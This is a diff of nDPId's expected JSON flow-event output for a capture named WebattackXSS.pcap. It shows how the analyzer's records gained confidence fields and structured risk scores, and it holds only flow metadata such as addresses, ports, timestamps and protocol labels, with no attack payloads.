-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348073365,"flow_last_seen":1499348078919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348074670,"flow_last_seen":1499348079919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348077218,"flow_last_seen":1499348082920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
